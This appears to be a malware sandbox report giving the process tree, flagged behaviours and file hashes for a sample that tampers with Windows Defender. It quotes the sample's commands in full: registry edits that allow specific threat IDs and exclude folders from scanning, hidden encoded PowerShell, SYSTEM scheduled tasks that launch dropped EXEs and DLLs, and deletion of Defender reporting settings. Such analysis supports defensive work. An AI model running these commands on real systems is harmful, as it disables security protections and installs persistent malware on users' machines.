C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2364
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4460
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JyOCsvAdkzLU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JyOCsvAdkzLU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QsEHNtqxqlZKC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QsEHNtqxqlZKC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bIbJMpHiU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bIbJMpHiU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gqlmldGVSRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gqlmldGVSRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BxsbYgSZTNUxiiVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BxsbYgSZTNUxiiVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EIQZTJtBDLOiQZhk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EIQZTJtBDLOiQZhk\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR" /t REG_DWORD /d 0 /reg:323⤵PID:1964
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR" /t REG_DWORD /d 0 /reg:324⤵PID:4580
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsEHNtqxqlZKC" /t REG_DWORD /d 0 /reg:323⤵PID:4772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bIbJMpHiU" /t REG_DWORD /d 0 /reg:323⤵PID:3672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsEHNtqxqlZKC" /t REG_DWORD /d 0 /reg:643⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gqlmldGVSRUn" /t REG_DWORD /d 0 /reg:323⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BxsbYgSZTNUxiiVB /t REG_DWORD /d 0 /reg:323⤵PID:1072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gqlmldGVSRUn" /t REG_DWORD /d 0 /reg:643⤵PID:3828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bIbJMpHiU" /t REG_DWORD /d 0 /reg:643⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BxsbYgSZTNUxiiVB /t REG_DWORD /d 0 /reg:643⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EIQZTJtBDLOiQZhk /t REG_DWORD /d 0 /reg:643⤵PID:3560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EIQZTJtBDLOiQZhk /t REG_DWORD /d 0 /reg:323⤵PID:1044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo /t REG_DWORD /d 0 /reg:643⤵PID:3012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo /t REG_DWORD /d 0 /reg:323⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JyOCsvAdkzLU2" /t REG_DWORD /d 0 /reg:643⤵PID:4180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JyOCsvAdkzLU2" /t REG_DWORD /d 0 /reg:323⤵PID:4508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR" /t REG_DWORD /d 0 /reg:643⤵PID:4644
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRTdvMYwZ" /SC once /ST 17:05:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRTdvMYwZ"2⤵PID:3028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRTdvMYwZ"2⤵PID:3240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AKVOOjzszwLKFadpj" /SC once /ST 00:30:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EIQZTJtBDLOiQZhk\sEzFwEFWTTreWYX\iOdOMXD.exe\" Jb /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AKVOOjzszwLKFadpj"2⤵PID:4552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4768
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4268
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4260
-
C:\Windows\Temp\EIQZTJtBDLOiQZhk\sEzFwEFWTTreWYX\iOdOMXD.exeC:\Windows\Temp\EIQZTJtBDLOiQZhk\sEzFwEFWTTreWYX\iOdOMXD.exe Jb /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNLHXISkhsXtOdkcGZ"2⤵PID:3220
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2400
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4508
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1300
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\bIbJMpHiU\FIMLTR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bnPMwlkfsyaLVIF" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnPMwlkfsyaLVIF2" /F /xml "C:\Program Files (x86)\bIbJMpHiU\lWfdfGp.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bnPMwlkfsyaLVIF"2⤵PID:2612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnPMwlkfsyaLVIF"2⤵PID:3472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hmBsCXLLLKPqbr" /F /xml "C:\Program Files (x86)\JyOCsvAdkzLU2\kohwANZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2088
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HgfgdZKhvLAHt2" /F /xml "C:\ProgramData\BxsbYgSZTNUxiiVB\dhmSfbk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UewjiCFzpdhgTrkoh2" /F /xml "C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR\yPAEkKS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uGSTgzapAnaQExNqydP2" /F /xml "C:\Program Files (x86)\QsEHNtqxqlZKC\oCsCUqp.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hkqwfOswAKcVIBvce" /SC once /ST 14:43:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EIQZTJtBDLOiQZhk\hTwhZNWN\PuLPuMA.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hkqwfOswAKcVIBvce"2⤵PID:4272
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3352
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3412
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AKVOOjzszwLKFadpj"2⤵PID:4556
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1236
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EIQZTJtBDLOiQZhk\hTwhZNWN\PuLPuMA.dll",#1 /site_id 5254031⤵PID:1924
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EIQZTJtBDLOiQZhk\hTwhZNWN\PuLPuMA.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1988 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hkqwfOswAKcVIBvce"3⤵PID:1264
-
-
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:641⤵PID:5012
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5029bfdfef8e0e8f5eac86f2421e3ddd1
SHA14efc84fda51f5679057965728a3f30acd7c0a99e
SHA256b684cf5a956cba0b12576605dfb64995c0e3da002ddd2e4d2d6340bbb9008be8
SHA512e9ba2720bcdd41eb1f7e3c0d31c1cc422e1f26ca4ccc96d8eba558b2536462a2fa8efb65a3762c7f2d5e97c773502e14b842311d8f6cd253112f900919d39969
-
Filesize
2KB
MD52a368aa98d0dbbfa0c44615e6ce7e874
SHA1c73b3e6563386a2b442718d0939d5f878afc211c
SHA256a3446e8d591e1a6e09ad7638a172dfa50ae39090e857b3ee5ec4cb3c5dfb748c
SHA512c848a07d18808c71c102fb97dba99372215c56be589306a51c9f141a9f8c09892c2eee609767e4146269ae35d7032dec9b07577e816e8cf7f1bd99ac65a20f56
-
Filesize
2KB
MD5ade7ed21dfcf2edd797cbb3a2d13a625
SHA1bee22564a419f7d4cc776d03175e0c4453d230c1
SHA256f5346f0d42ba3e3001b97b3e5a7aa40d9b2525e5c526624de08318ab49fb96c6
SHA512c9fc239200d02f51d7dc6272ea5506fb1fd3f7ffc1fb39fa6ef8f546b297670f7b78bb239a448e127f4fbf9bcdff37dd6f86f3e7ccdc349404a351d928730c12
-
Filesize
2KB
MD582739855e2fd97a1329675a0bf09ece3
SHA1a56b18cacdc97f3b76034cc28b170574e5a2cf31
SHA2560072bb9f063a9bf1d3bea44399da435baf0bf6fb27494889e0cf7ec17bf4199a
SHA51265e286f583b9971fe5524afb637e08537cc05c19a534fbe8316746fbec29bc4ae2a658bbd145a427542f7b5c5b69341aa7fab7a3dd2c9afd05b3a11eef3af05d
-
Filesize
2KB
MD5c9722767be1a04e664f76c6c46de9cf3
SHA1dfba8125365980a057e5b81a580079939ce9c773
SHA2564443be7598d49f6c24ff8318a1af55c63120a2317b5b1e483a8d4968d0d9ea20
SHA5121a2b52d43006224e6f197d280f8da3fa5daecfaa2a17319c30aa60986951846b6286edb9381a4528b02dc219fc580eb3a26304d2c7e5a37e75121b5c8f8537cc
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
6.3MB
MD5d7eb640fef2812eabf99cf1dc15209e9
SHA141fbfdc644d1c418e1bdab0618e60e8159054e7d
SHA2568af4a341c8563248cb617a144c347092eedab4dbcf0e11c8361004c68353a2ca
